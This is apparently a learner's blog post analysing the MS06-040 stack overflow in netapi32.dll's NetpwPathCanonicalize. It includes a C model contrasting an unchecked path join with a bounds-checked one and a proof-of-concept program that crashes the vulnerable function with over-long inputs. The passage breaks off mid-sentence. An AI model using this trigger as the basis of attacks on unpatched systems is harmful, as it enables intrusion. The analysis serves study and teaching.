I recently started learning vulnerability analysis. After working through the Windows security mechanisms, the next step was to find real cases to practise on. MS06-040 is a classic stack overflow whose root cause is easy to understand, so I am sharing my own analysis here in the hope that it helps others who are also new to vulnerability analysis.
The vulnerability lives in NetpwPathCanonicalize(), an exported function of netapi32.dll. Its prototype is:

    int NetpwPathCanonicalize (
        uint16  path[],     // [in]  path name
        uint8   can_path[], // [out] canonicalized path
        uint32  maxbuf,     // [in]  max size of can_path
        uint16  prefix[],   // [in]  path prefix
        uint32* pathtype,   // [in out] path type
        uint32  pathflags   // [in]  path flags, 0 or 1
    );
Its job is to join prefix and path with a `\` character and write the result into can_path, whose capacity is maxbuf. The bug is that the combined length is not checked against that capacity, so an over-long prefix and path run past the end of the output buffer.
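To make the overflow class concrete, here is an added model of the "prefix + `\` + path into can_path" step. It is written for this page and is not code from netapi32.dll or from the original post. The function names join_path_unchecked and join_path_checked, the status codes and the helper names are assumptions; the buffer sizes mirror the POC below, and maxbuf is treated as a byte count, as the prototype's comment implies. The unchecked variant shows the bug pattern, the checked variant the length test that prevents it.

```c
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical model of the canonicalization step, not the netapi32.dll code.
 * Status values loosely mimic NET_API_STATUS: 0 = success, 87 = ERROR_INVALID_PARAMETER. */
#define MODEL_SUCCESS           0
#define MODEL_INVALID_PARAMETER 87

/* Bug pattern: prefix, separator and path are copied into can_path without
 * consulting maxbuf. With a maxbuf-sized can_path on the stack and long
 * inputs, the bytes past can_path overwrite saved registers and the return
 * address. Only ever call this with inputs that fit. */
int join_path_unchecked(const wchar_t *path, wchar_t *can_path,
                        unsigned maxbuf, const wchar_t *prefix)
{
    (void)maxbuf;                 /* the limit is ignored: that is the bug */
    wcscpy(can_path, prefix);
    wcscat(can_path, L"\\");
    wcscat(can_path, path);
    return MODEL_SUCCESS;
}

/* Hardened form: maxbuf is a byte count, so compute the required size in
 * wide characters (separator and terminating NUL included) and refuse the
 * request before writing anything if it does not fit. */
int join_path_checked(const wchar_t *path, wchar_t *can_path,
                      unsigned maxbuf, const wchar_t *prefix)
{
    size_t need_chars = wcslen(prefix) + 1 /* '\\' */ + wcslen(path) + 1 /* NUL */;
    if (need_chars > maxbuf / sizeof(wchar_t))
        return MODEL_INVALID_PARAMETER;
    wcscpy(can_path, prefix);
    wcscat(can_path, L"\\");
    wcscat(can_path, path);
    return MODEL_SUCCESS;
}

/* Fills buf with n copies of ch plus a NUL, like the POC's memset(..., 'a', ...). */
static void fill(wchar_t *buf, size_t n, wchar_t ch)
{
    for (size_t i = 0; i < n; i++) buf[i] = ch;
    buf[n] = L'\0';
}

/* Runs the checked join with the POC's sizes (0x31e 'a's, 0xfe 'b's,
 * maxbuf 0x440). 0x31e + 1 + 0xfe + 1 = 0x41e wide chars exceeds 0x440 bytes
 * whether wchar_t is 2 or 4 bytes, so the expected status is 87. */
int model_status_for_poc_sizes(void)
{
    wchar_t path[0x320], prefix[0x100];
    wchar_t can_path[0x440 / sizeof(wchar_t)];
    fill(path, 0x31e, L'a');
    fill(prefix, 0xfe, L'b');
    return join_path_checked(path, can_path, 0x440, prefix);
}

/* Small input through both variants; returns 1 if both yield "bbbb\aaaa". */
int model_small_join_ok(void)
{
    wchar_t out1[64], out2[64];
    int s1 = join_path_checked(L"aaaa", out1, sizeof out1, L"bbbb");
    int s2 = join_path_unchecked(L"aaaa", out2, sizeof out2, L"bbbb");
    return s1 == MODEL_SUCCESS && s2 == MODEL_SUCCESS
        && wcscmp(out1, L"bbbb\\aaaa") == 0 && wcscmp(out2, L"bbbb\\aaaa") == 0;
}

int main(void)
{
    printf("checked join with POC sizes -> status %d (87 = rejected)\n",
           model_status_for_poc_sizes());
    printf("small input through both variants ok -> %d\n", model_small_join_ok());
    /* join_path_unchecked with the POC-sized buffers would write far past the
     * end of a 0x440-byte can_path on the stack; it is deliberately not run. */
    return 0;
}
```

The check belongs before the first write, not after: once wcscpy has run, the frame is already corrupted, so a late check cannot undo the damage.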
A POC that triggers the vulnerability:
    #include <windows.h>
    #include <string.h>

    // Function-pointer type for the export. netapi32 exports use the stdcall
    // (NET_API_FUNCTION) convention, so the pointer is declared WINAPI.
    typedef void (WINAPI *MYPROC)(LPTSTR, LPTSTR, int, LPTSTR, long *, long);

    int main() {
        char path[0x320];        // [in]  path, filled with 'a'
        char can_path[0x440];    // [out] canonicalized path
        int maxbuf = 0x440;      // declared capacity of can_path, in bytes
        char prefix[0x100];      // [in]  prefix, filled with 'b'
        long pathtype = 44;
        HINSTANCE LibHandle;
        MYPROC Trigger;
        // Load the vulnerable copy of the DLL placed in the working directory,
        // not the patched system one.
        char dll[] = "./netapi32.dll";
        char VulFunc[] = "NetpwPathCanonicalize";

        LibHandle = LoadLibrary(dll);
        Trigger = (MYPROC)GetProcAddress(LibHandle, VulFunc);

        // Long, NUL-terminated inputs: prefix + '\' + path is far larger than maxbuf.
        memset(path, 0, sizeof(path));
        memset(path, 'a', sizeof(path) - 2);
        memset(prefix, 0, sizeof(prefix));
        memset(prefix, 'b', sizeof(prefix) - 2);

        (Trigger)(path, can_path, maxbuf, prefix, &pathtype, 0);

        FreeLibrary(LibHandle);
        return 0;
    }
The code loads the vulnerable netapi32.dll and calls the vulnerable function directly to reproduce the bug.
Here path and prefix are set to long strings so that the stack overflow triggers; compile and run until the exception appears:
The exception is raised when execution reaches the following function inside NetpwPathCanonicalize: